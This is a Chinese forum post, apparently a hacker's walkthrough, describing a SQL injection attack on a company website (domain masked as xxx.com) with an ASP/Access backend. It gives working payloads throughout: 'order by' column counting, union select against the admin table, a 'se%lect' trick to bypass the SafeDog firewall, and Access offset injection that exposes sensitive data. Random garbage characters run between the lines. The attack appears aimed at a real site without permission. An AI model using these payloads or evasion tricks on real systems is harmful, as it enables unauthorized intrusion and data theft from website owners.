打开网站,一个企业站。
( w% T7 F' x- i6 d' s
9 t ]& Z6 _( c% ^% @+ @* s9 Z
4 w: a; I5 y8 N, a1 A& d/ }( n顺手加个admin
. a$ J8 [; q5 T0 I0 z2 T
& |, ^+ |0 P/ Q8 E7 N. z% |, R( J" B" K& y( G- Q
默认后台。
! X3 E8 @* o, N( f回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
1 o& u4 G. O* X% I$ q
( H+ R4 a# z( v/ V( {- e& O# U5 a4 c& D- \/ o
( @9 Q* O9 G1 Z. B; k4 y* d所以就不用御剑扫了,待会直接封IP。
- L W; [: ^5 Z+ R* v) n
5 [2 N8 Z* g* l# i) O用order by语句判断是否存在注入。7 D9 X4 Q+ V: _5 [$ R' ?% f
http://www.xxx.com /product_show.asp?id=997 order by 14 J" J+ t, G& r9 ?% F! l! k' ?
http://www.xxx.com /product_show.asp?id=997 order by 100! R3 `0 B1 F" d0 A
现在存在注入,经测试后发现是9个字段。
8 H1 K7 b4 } k. _ p) v( V 9 I7 ^, }- b8 y7 ]/ k8 l) d8 s0 a8 r
接下来进行联合查询,猜是否存在admin表。( [7 h ^9 M6 I* ]
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
8 P' t1 t# \, E8 A& x, `6 \3 n5 ~; `5 ?5 l' Z% |
2 O I2 E2 y2 g2 U. [2 j) C8 C
+ ]- j3 E; [- V* q/ A9 i- N
在select中间加个%,se%lect绕过安全狗。2 W) B: G+ Z. n. w6 h( |' W
% y" e5 h" ~; x5 m
' I) m: i( P9 }2 s; a. B$ t
发现存在admin表,然后开始手工猜常用的字段。
, S% K2 Q- X5 A$ X纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。' [ T- B) J! K2 |/ \+ v
( J; c/ z( J$ {4 n9 g9 u" l突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
( X% C8 {# ^5 Y r/ S+ |5 K . M3 L/ n( o. |% z' c. X
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
0 [' K5 U; ]0 g9 A p; m" `9 j8 T% Hhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin. `0 |' f3 J. C
好了,敏感内容出显了。3 T% t; A; b* i! i. V# ~; L4 ~. M
- f/ {9 |9 K6 P3 W$ k" i Z5 A$ ?6 F9 [- K$ P! ^' d: c9 ^+ B
8 G. l) J I7 a# l& C- j) f
|